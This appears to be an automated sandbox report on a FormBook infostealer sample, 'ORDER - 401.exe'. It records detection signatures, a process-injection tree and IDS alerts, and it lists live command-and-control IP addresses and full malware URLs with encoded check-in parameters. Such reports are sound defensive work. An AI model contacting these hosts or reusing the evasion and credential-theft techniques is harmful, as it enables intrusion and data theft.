
Windows Analysis Report
ORDER - 401.exe

Overview

General Information

Sample name: ORDER - 401.exe
Analysis ID: 1575104
MD5: 0b1dccaee94a61586e90e0a62ab20100
SHA1: e0af85037a69f302e5f9f7343253ad6e1c800fd5
SHA256: c614c851b9fe906089e94db09ebd858fc5e4fa04613d92cd8566b3d34297381b
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ORDER - 401.exe (PID: 940 cmdline: "C:\Users\user\Desktop\ORDER - 401.exe" MD5: 0B1DCCAEE94A61586E90E0A62AB20100)
    • ORDER - 401.exe (PID: 3716 cmdline: "C:\Users\user\Desktop\ORDER - 401.exe" MD5: 0B1DCCAEE94A61586E90E0A62AB20100)
    • ORDER - 401.exe (PID: 2124 cmdline: "C:\Users\user\Desktop\ORDER - 401.exe" MD5: 0B1DCCAEE94A61586E90E0A62AB20100)
    • ORDER - 401.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\ORDER - 401.exe" MD5: 0B1DCCAEE94A61586E90E0A62AB20100)
      • ZaZCnGdXtY.exe (PID: 3136 cmdline: "C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ieUnatt.exe (PID: 4072 cmdline: "C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E)
          • ZaZCnGdXtY.exe (PID: 6008 cmdline: "C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5704 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
5.2.ORDER - 401.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.ORDER - 401.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T13:50:00.870710+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | TCP
2024-12-14T13:50:26.635454+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49865 | 13.228.81.39 | 80 | TCP
2024-12-14T13:50:41.363963+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49901 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:56.996275+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49942 | 185.42.14.166 | 80 | TCP
2024-12-14T13:51:12.742743+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49981 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:27.644739+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50020 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:44.674370+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50031 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:59.883911+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50035 | 77.68.64.45 | 80 | TCP
2024-12-14T13:52:15.991017+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50041 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:30.801841+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50045 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:45.557053+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50049 | 104.21.77.71 | 80 | TCP
2024-12-14T13:53:00.357479+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50053 | 172.67.220.36 | 80 | TCP
2024-12-14T13:53:15.421804+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50059 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:30.855901+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50063 | 81.2.196.19 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T13:50:00.870710+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | TCP
2024-12-14T13:50:26.635454+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49865 | 13.228.81.39 | 80 | TCP
2024-12-14T13:50:41.363963+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49901 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:56.996275+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49942 | 185.42.14.166 | 80 | TCP
2024-12-14T13:51:12.742743+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49981 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:27.644739+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50020 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:44.674370+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50031 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:59.883911+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50035 | 77.68.64.45 | 80 | TCP
2024-12-14T13:52:15.991017+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50041 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:30.801841+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50045 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:45.557053+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50049 | 104.21.77.71 | 80 | TCP
2024-12-14T13:53:00.357479+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50053 | 172.67.220.36 | 80 | TCP
2024-12-14T13:53:15.421804+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50059 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:30.855901+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50063 | 81.2.196.19 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T13:50:18.578499+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49843 | 13.228.81.39 | 80 | TCP
2024-12-14T13:50:21.234518+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49849 | 13.228.81.39 | 80 | TCP
2024-12-14T13:50:23.906363+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49859 | 13.228.81.39 | 80 | TCP
2024-12-14T13:50:33.366325+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49882 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:36.030415+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49888 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:38.712022+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49895 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:48.616036+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49917 | 185.42.14.166 | 80 | TCP
2024-12-14T13:50:51.276243+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49929 | 185.42.14.166 | 80 | TCP
2024-12-14T13:50:53.959214+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49935 | 185.42.14.166 | 80 | TCP
2024-12-14T13:51:04.317728+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49959 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:07.404255+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49965 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:10.137287+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49974 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:19.636546+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49998 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:22.304891+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50004 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:24.980711+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50012 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:35.606703+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50028 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:38.352647+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50029 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:41.083079+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50030 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:51.687251+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50032 | 77.68.64.45 | 80 | TCP
2024-12-14T13:51:54.365294+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50033 | 77.68.64.45 | 80 | TCP
2024-12-14T13:51:57.217666+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50034 | 77.68.64.45 | 80 | TCP
2024-12-14T13:52:07.434173+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50038 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:10.170829+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50039 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:12.932527+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50040 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:22.793820+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50042 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:25.457591+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50043 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:28.132803+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50044 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:37.562250+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50046 | 104.21.77.71 | 80 | TCP
2024-12-14T13:52:40.212187+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50047 | 104.21.77.71 | 80 | TCP
2024-12-14T13:52:42.888647+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50048 | 104.21.77.71 | 80 | TCP
2024-12-14T13:52:52.336545+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50050 | 172.67.220.36 | 80 | TCP
2024-12-14T13:52:55.020976+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50051 | 172.67.220.36 | 80 | TCP
2024-12-14T13:52:57.703236+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50052 | 172.67.220.36 | 80 | TCP
2024-12-14T13:53:07.609519+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50054 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:10.281537+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50057 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:12.937669+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50058 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:22.487121+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50060 | 81.2.196.19 | 80 | TCP
2024-12-14T13:53:25.152051+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50061 | 81.2.196.19 | 80 | TCP
2024-12-14T13:53:28.184283+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50062 | 81.2.196.19 | 80 | TCP


AV Detection

Source: http://www.123hellodrive.shop/vc3u/ | Avira URL Cloud: Label: malware
Source: http://www.muasamgiare.click/bsye/ | Avira URL Cloud: Label: malware
Source: http://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8 | Avira URL Cloud: Label: malware
Source: http://www.123hellodrive.shop/vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8 | Avira URL Cloud: Label: malware
Source: https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK | Avira URL Cloud: Label: malware
Source: http://www.appsolucao.shop/qt4m/ | Avira URL Cloud: Label: malware
Source: http://www.appsolucao.shop/qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8 | Avira URL Cloud: Label: malware
Source: ORDER - 401.exe | Virustotal: Detection: 77%
Source: ORDER - 401.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: 5.2.ORDER - 401.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.ORDER - 401.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: ORDER - 401.exe | Joe Sandbox ML: detected
Source: ORDER - 401.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ORDER - 401.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ieUnAtt.pdbGCTL | source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000812000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000831000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: ZaZCnGdXtY.exe, 00000007.00000002.4676883405.0000000000CAE000.00000002.00000001.01000000.0000000C.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4676537211.0000000000CAE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: ieUnAtt.pdb | source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000812000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000831000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: ORDER - 401.exe, 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2477340893.0000000003F4F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2479593417.00000000040F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: ORDER - 401.exe, ORDER - 401.exe, 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2477340893.0000000003F4F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2479593417.00000000040F4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001BCC50 FindFirstFileW,FindNextFileW,FindClose | 8_2_001BCC50
Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 4x nop then xor eax, eax | 8_2_001A9F60
Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 4x nop then mov ebx, 00000004h | 8_2_045F04E8

Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49843 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49888 -> 172.67.129.38:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49801 -> 154.12.28.184:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49859 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49801 -> 154.12.28.184:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49849 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49865 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49865 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49929 -> 185.42.14.166:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49942 -> 185.42.14.166:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49942 -> 185.42.14.166:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49935 -> 185.42.14.166:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49917 -> 185.42.14.166:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49882 -> 172.67.129.38:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49965 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49981 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49981 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49974 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49895 -> 172.67.129.38:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50020 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50033 -> 77.68.64.45:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50035 -> 77.68.64.45:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50030 -> 154.208.202.225:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50031 -> 154.208.202.225:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50031 -> 154.208.202.225:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50034 -> 77.68.64.45:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 77.68.64.45:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50043 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49901 -> 172.67.129.38:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49901 -> 172.67.129.38:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50044 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50047 -> 104.21.77.71:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50053 -> 172.67.220.36:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50053 -> 172.67.220.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50046 -> 104.21.77.71:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50042 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50050 -> 172.67.220.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50057 -> 162.0.217.35:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49959 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50059 -> 162.0.217.35:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50054 -> 162.0.217.35:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50058 -> 162.0.217.35:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50035 -> 77.68.64.45:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50049 -> 104.21.77.71:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50059 -> 162.0.217.35:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50062 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50049 -> 104.21.77.71:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50061 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 154.208.202.225:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50038 -> 208.91.197.27:80
